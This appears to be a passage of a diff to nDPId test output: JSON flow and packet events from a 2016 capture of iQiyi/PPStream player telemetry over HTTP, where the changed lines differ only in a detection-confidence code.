{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"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"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"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"} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"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"} -01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} 
-01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} 
+01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2
luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 